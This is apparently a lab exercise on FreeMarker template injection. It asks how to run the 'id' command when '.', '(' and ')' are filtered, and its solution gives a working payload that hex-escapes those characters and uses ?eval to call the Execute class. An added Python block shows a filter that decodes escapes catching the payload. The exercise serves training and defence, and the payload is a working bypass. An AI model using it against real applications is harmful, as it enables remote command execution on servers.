Freemarker

Command execution with constraints


Using the training payload Command execution as a model, find a way to execute the same payload without the characters ., ) and (.

Goal: Execute the id shell command

Hints

Hint #1

A character like ., ) or ( has a hexadecimal code that can be used as a substitute for the actual character.

Hint #2

?eval evaluates an expression in a string.

Hint #3

Sometimes a letter that follows a hexadecimal code is read as part of that code, and must itself be written as a hexadecimal code.

Solution


The solution is to replace the ., ( and ) of the training payload Command execution with their hexadecimal codes, which gives: ${'"freemarker\x2Etemplate\x2Eutility\x2EExecute"?new\x28\x29\x28"id"\x29'?eval}.

A problem arises: \x2EE is not understood as a ., because E is itself a hexadecimal digit and is read as part of the code. The E of Execute must therefore also be encoded, which gives: ${'"freemarker\x2Etemplate\x2Eutility\x2E\x45xecute"?new\x28\x29\x28"id"\x29'?eval}.
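
The escape behaviour described in the solution, seen from the filter's side, as an added example that is not part of the original exercise: Python code that decodes FreeMarker-style \x escapes (1 to 4 hexadecimal digits, read greedily) before applying the character check. The function names and the blocked-character set are assumptions for illustration; the two sample strings are the payloads quoted above.

```python
import re

# FreeMarker string literals accept \x followed by 1 to 4 hexadecimal digits,
# read greedily, so \x2EE is one character (U+02EE), not "." followed by "E".
HEX_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{1,4})")

# Assumption: the filter in the exercise rejects exactly these characters.
BLOCKED = set(".()")

# The two payloads quoted in the solution above, kept as raw strings.
PAGE_FIRST = r'''${'"freemarker\x2Etemplate\x2Eutility\x2EExecute"?new\x28\x29\x28"id"\x29'?eval}'''
PAGE_FINAL = r'''${'"freemarker\x2Etemplate\x2Eutility\x2E\x45xecute"?new\x28\x29\x28"id"\x29'?eval}'''


def decode_hex_escapes(text):
    """Replace each \\x escape with the character the template engine would see."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)


def naive_blocked(text):
    """Filter that inspects the raw input only."""
    return any(ch in BLOCKED for ch in text)


def canonical_blocked(text):
    """Filter that decodes escapes first, then applies the same character check."""
    return naive_blocked(decode_hex_escapes(text))


def uses_eval(text):
    """Flag the ?eval built-in, which turns a decoded string back into an expression."""
    return re.search(r"\?eval\b", text) is not None


if __name__ == "__main__":
    for name, payload in (("first", PAGE_FIRST), ("final", PAGE_FINAL)):
        print(name, "raw filter:", naive_blocked(payload),
              "| decoded filter:", canonical_blocked(payload),
              "| ?eval:", uses_eval(payload))
        # ascii() keeps U+02EE visible as \u02ee on any terminal encoding.
        print("  decoded:", ascii(decode_hex_escapes(payload)))
```

Both payloads pass the raw check and are caught once the escapes are decoded; other FreeMarker escapes such as \\ and \" are outside what this block handles.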
